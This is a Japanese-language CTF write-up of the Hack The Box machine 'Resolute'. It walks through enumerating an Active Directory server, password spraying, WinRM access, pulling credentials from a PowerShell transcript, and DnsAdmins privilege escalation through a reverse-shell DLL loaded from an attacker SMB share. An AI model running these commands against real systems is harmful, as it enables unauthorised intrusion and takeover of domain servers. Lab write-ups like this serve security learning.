shinobi CTF

HTBとCTF頑張る

Hack The Box Resolute

Resolute

tags: HTB Medium

Procedure

User Flag

  • nmap

      PORT      STATE SERVICE      VERSION
      53/tcp    open  domain       Microsoft DNS
      88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-09 01:19:47Z)
      135/tcp   open  msrpc        Microsoft Windows RPC
      139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
      389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
      445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
      464/tcp   open  kpasswd5?
      593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
      636/tcp   open  tcpwrapped
      3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
      3269/tcp  open  tcpwrapped
      5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
      9389/tcp  open  mc-nmf       .NET Message Framing
      47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
      49664/tcp open  msrpc        Microsoft Windows RPC
      49665/tcp open  msrpc        Microsoft Windows RPC
      49666/tcp open  msrpc        Microsoft Windows RPC
      49667/tcp open  msrpc        Microsoft Windows RPC
      49671/tcp open  msrpc        Microsoft Windows RPC
      49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
      49677/tcp open  msrpc        Microsoft Windows RPC
      49688/tcp open  msrpc        Microsoft Windows RPC
      49709/tcp open  msrpc        Microsoft Windows RPC
      62192/tcp open  tcpwrapped
      63729/tcp open  tcpwrapped
      No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
      TCP/IP fingerprint:
      OS:SCAN(V=7.60%E=4%D=5/9%OT=53%CT=1%CU=37102%PV=Y%DS=2%DC=I%G=Y%TM=5EB603E2
      OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=O%TS=A)
      OS:SEQ(SP=101%GCD=1%ISR=108%TI=I%CI=RD%TS=A)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%TS
      OS:=A)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M
      OS:54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
      OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
      OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
      OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
      OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
      OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
      OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
      OS:=N%T=80%CD=Z)
    
      Network Distance: 2 hops
      Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
    

    ADのWindows Serverっぽい。

  • nmap script

      $ sudo nmap -p445 --script smb-enum-shares,smb-enum-users  10.10.10.169 
    
      Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-09 10:38 JST
      PORT    STATE SERVICE
      445/tcp open  microsoft-ds
    
      Host script results:
      | smb-enum-shares: 
      |   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
      |   account_used: <blank>
      |   \\10.10.10.169\ADMIN$: 
      |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
      |     Anonymous access: <none>
      |   \\10.10.10.169\C$: 
      |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
      |     Anonymous access: <none>
      |   \\10.10.10.169\IPC$: 
      |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
      |     Anonymous access: READ
      |   \\10.10.10.169\NETLOGON: 
      |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
      |_    Anonymous access: <none>
      | smb-enum-users: 
      |   MEGABANK\abigail (RID: 6602)
      |     Flags:       Normal user account
      |   MEGABANK\Administrator (RID: 500)
      |     Description: Built-in account for administering the computer/domain
      |     Flags:       Password does not expire, Normal user account
      |   MEGABANK\angela (RID: 6606)
      |     Flags:       Normal user account
      |   MEGABANK\annette (RID: 6614)
      |     Flags:       Normal user account
      |   MEGABANK\annika (RID: 6615)
      |     Flags:       Normal user account
      |   MEGABANK\claire (RID: 6611)
      |     Flags:       Normal user account
      |   MEGABANK\claude (RID: 6617)
      |     Flags:       Normal user account
      |   MEGABANK\DefaultAccount (RID: 503)
      |     Description: A user account managed by the system.
      |     Flags:       Password not required, Account disabled, Password does not expire, Normal user account
      |   MEGABANK\felicia (RID: 6607)
      |     Flags:       Normal user account
      |   MEGABANK\fred (RID: 6605)
      |     Flags:       Normal user account
      |   MEGABANK\Guest (RID: 501)
      |     Description: Built-in account for guest access to the computer/domain
      |     Flags:       Password not required, Account disabled, Password does not expire, Normal user account
      |   MEGABANK\gustavo (RID: 6608)
      |     Flags:       Normal user account
      |   MEGABANK\krbtgt (RID: 502)
      |     Description: Key Distribution Center Service Account
      |     Flags:       Account disabled, Normal user account
      |   MEGABANK\marcus (RID: 6603)
      |     Flags:       Normal user account
      |   MEGABANK\marko (RID: 1111)
      |     Full name:   Marko Novak
      |     Description: Account created. Password set to Welcome123!
      |     Flags:       Password does not expire, Normal user account
      |   MEGABANK\melanie (RID: 10101)
      |     Flags:       Normal user account
      |   MEGABANK\naoki (RID: 10104)
      |     Flags:       Normal user account
      |   MEGABANK\paulo (RID: 6612)
      |     Flags:       Normal user account
      |   MEGABANK\per (RID: 6616)
      |     Flags:       Normal user account
      |   MEGABANK\ryan (RID: 1105)
      |     Full name:   Ryan Bertrand
      |_    Flags:       Password does not expire, Normal user account
    

    markoのDescriptionの欄に、Account created. Password set to Welcome123!と記載があり、かなり怪しい。

  • smb login attempt

    marko/Welcome123!の認証情報でsmbclientを使って、ログインを試す。

      $ smbclient -U marko -L  10.10.10.169
      WARNING: The "syslog" option is deprecated
      Enter WORKGROUP\marko's password: 
      session setup failed: NT_STATUS_LOGON_FAILURE
    

    どうもダメっぽい、、、 どうせなら、全ユーザで辞書攻撃をしてみる。

      $ hydra -L userlist.txt -p Welcome123! 10.10.10.169 smb
      Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    
      Hydra (http://www.thc.org/thc-hydra) starting at 2020-05-09 10:54:01
      [INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
      [DATA] max 1 task per 1 server, overall 1 task, 27 login tries (l:27/p:1), ~27 tries per task
      [DATA] attacking smb://10.10.10.169:445/
      [445][smb] host: 10.10.10.169   login: melanie   password: Welcome123!
      1 of 1 target successfully completed, 1 valid password found
      Hydra (http://www.thc.org/thc-hydra) finished at 2020-05-09 10:54:19
    

    melanieアカウントでヒットした!

    smbclientで再度ログイン。

      $ smbclient -U melanie -L  10.10.10.169
      WARNING: The "syslog" option is deprecated
      Enter WORKGROUP\melanie's password: 
    
          Sharename       Type      Comment
          ---------       ----      -------
          ADMIN$          Disk      Remote Admin
          C$              Disk      Default share
          IPC$            IPC       Remote IPC
          NETLOGON        Disk      Logon server share 
          SYSVOL          Disk      Logon server share 
    
      $ smbclient -U melanie  \\\\10.10.10.169\\NETLOGON
      WARNING: The "syslog" option is deprecated
      Enter WORKGROUP\melanie's password: 
    
      smb: \> ls
      .                                   D        0  Wed Sep 25 22:28:21 2019
      ..                                  D        0  Wed Sep 25 22:28:21 2019
    
              10340607 blocks of size 4096. 7561451 blocks available
    

    ログイン成功! NETLOGONには何も見当たらなかったので、SYSVOLへログイン。

      $ smbclient -U melanie  \\\\10.10.10.169\\SYSVOL
      WARNING: The "syslog" option is deprecated
      Enter WORKGROUP\melanie's password: 
      Try "help" to get a list of possible commands.
      smb: \> ls
      .                                   D        0  Wed Sep 25 22:28:21 2019
      ..                                  D        0  Wed Sep 25 22:28:21 2019
      megabank.local                      D        0  Wed Sep 25 22:28:21 2019
    

    megabank.local下のディレクトリをダウンロードしてきたが、特に情報が見当たらない。

      $ tree ./
      ./
      ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
      │   ├── GPT.INI
      │   ├── MACHINE
      │   │   ├── Microsoft
      │   │   │   └── Windows NT
      │   │   │       └── SecEdit
      │   │   │           └── GptTmpl.inf
      │   │   └── Scripts
      │   │       ├── Shutdown
      │   │       └── Startup
      │   └── USER
      ├── {6AC1786C-016F-11D2-945F-00C04fB984F9}
      │   ├── GPT.INI
      │   ├── MACHINE
      │   │   └── Microsoft
      │   │       └── Windows NT
      │   │           └── SecEdit
      │   │               └── GptTmpl.inf
      │   └── USER
      ├── nmap_sV_fullport.txt
      └── userlist.txt
    
  • 入手したクレデンシャルで、サーバからさらに情報取得を試みる。
    ldapdomaindumpを使う

      $ ldapdomaindump -u MEGABANK\\melanie -p Welcome123! 10.10.10.169
      [*] Connecting to host...
      [*] Binding to host
      [+] Bind OK
      [*] Starting domain dump
      [+] Domain dump finished
    
      $ firefox *.html
    

    ldapサーバの各種情報をダンプしてくれる。 malanieはRemote Management Usersグループに所属している。Remote Managementというのは、その名の通り、リモートでサーバをマネジメントできる機能でWindows Server 2016以降ではデフォルトでenableになっている。デフォルトのポートは5985/tcp

  • Exploit

    • Remote Management用のshellツールを使ってアクセスする。

        $ ./evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169
      
        Evil-WinRM shell v2.3
      
        Info: Establishing connection to remote endpoint
      
        *Evil-WinRM* PS C:\Users\melanie\Documents>
        *Evil-WinRM* PS C:\Users\melanie\Desktop> ls
      
      
            Directory: C:\Users\melanie\Desktop
      
      
        Mode                LastWriteTime         Length Name
        ----                -------------         ------ ----
        -ar---        12/3/2019   7:33 AM             32 user.txt
      

      目的のファイルを発見、フラグゲット!!

  • local recon

    他のユーザディレクトリがあるかチェック。ryanというユーザがいるよう。

     PS C:\Users\melanie\Documents> ls ../../
         Directory: C:\Users
     Mode                LastWriteTime         Length Name
     ----                -------------         ------ ----
     d-----        9/25/2019  10:43 AM                Administrator
     d-----        12/4/2019   2:46 AM                melanie
     d-r---       11/20/2016   6:39 PM                Public
     d-----        9/27/2019   7:05 AM                ryan
    

    C直下に隠しディレクトリが存在し、その下にはtranscriptが存在する。transcryptとは、PowerShellのログをテキストファイルに書き出したもの。!!directory walkingは大事!!

     *Evil-WinRM* PS C:\> dir -hidden
         Directory: C:\
     Mode                LastWriteTime         Length Name
     ----                -------------         ------ ----
     d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
     d--hsl        9/25/2019  10:17 AM                Documents and Settings
     d--h--        9/25/2019  10:48 AM                ProgramData
     d--h--        12/3/2019   6:32 AM                PSTranscripts
     d--hs-        9/25/2019  10:17 AM                Recovery
     d--hs-        9/25/2019   6:25 AM                System Volume Information
     -arhs-       11/20/2016   5:59 PM         389408 bootmgr
     -a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
     -a-hs-        5/10/2020   8:35 PM      402653184 pagefile.sys
    
     *Evil-WinRM* PS C:\> cd PSTranscripts
     *Evil-WinRM* PS C:\PSTranscripts> dir -hidden
         Directory: C:\PSTranscripts
     Mode                LastWriteTime         Length Name
     ----                -------------         ------ ----
     d--h--        12/3/2019   6:45 AM                20191203
     *Evil-WinRM* PS C:\PSTranscripts> cd 20191203
     *Evil-WinRM* PS C:\PSTranscripts\20191203> dir -hidden
         Directory: C:\PSTranscripts\20191203
     Mode                LastWriteTime         Length Name
     ----                -------------         ------ ----
     -arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
    

    中を見ると、ryanはbackupディレクトリをマウントしたログが残っている。パスワードがコマンドライン引数で渡されている。

      >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
    

    ryanアカウントでログインできた。

     $ /opt/evil-winrm/evil-winrm.rb -u ryan -p Serv3r4Admin4cc123! -i 10.10.10.169
     Evil-WinRM shell v2.3
     Info: Establishing connection to remote endpoint
    
     *Evil-WinRM* PS C:\Users\ryan\Documents> whoami
     megabank\ryan
    

    ryanはContractorsで、DnsAdminsのグループに所属している。'dnsadmin exploid'でぐぐると権限昇格の記事がヒットした。リバースシェルを呼び出すdllをdnsのプロセスに読ませるらしい。記事通りdllを作って、

      $ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -f dll > privesc.dll
    

    自分の手元でSMBサーバ立てて、

    $ python3 /opt/impacket/examples/smbserver.py share ./
    

    リスナーをたてて、

     $ nc -lvnp 4444
    

    DLLを読み込ませて、dnsを再起動すると、

     *Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.15.3\share\privesc.dll
    
     Registry property serverlevelplugindll successfully reset.
     Command completed successfully.
    
     *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
    
     SERVICE_NAME: dns
             TYPE               : 10  WIN32_OWN_PROCESS
             STATE              : 3  STOP_PENDING
                                     (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
             WIN32_EXIT_CODE    : 0  (0x0)
             SERVICE_EXIT_CODE  : 0  (0x0)
             CHECKPOINT         : 0x0
             WAIT_HINT          : 0x0
     *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
    
     SERVICE_NAME: dns
             TYPE               : 10  WIN32_OWN_PROCESS
             STATE              : 2  START_PENDING
                                     (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
             WIN32_EXIT_CODE    : 0  (0x0)
             SERVICE_EXIT_CODE  : 0  (0x0)
             CHECKPOINT         : 0x0
             WAIT_HINT          : 0x7d0
             PID                : 2444
             FLAGS              :
    

    リバースシェルが起動した。権限昇格完了。あとはフラグをとるだけ。

     $ nc -lnvp 4444
     Listening on [0.0.0.0] (family 0, port 4444)
    
     Connection from 10.10.10.169 56314 received!
     Microsoft Windows [Version 10.0.14393]
     (c) 2016 Microsoft Corporation. All rights reserved.
    
     C:\Windows\system32>whoami
     whoami
     nt authority\system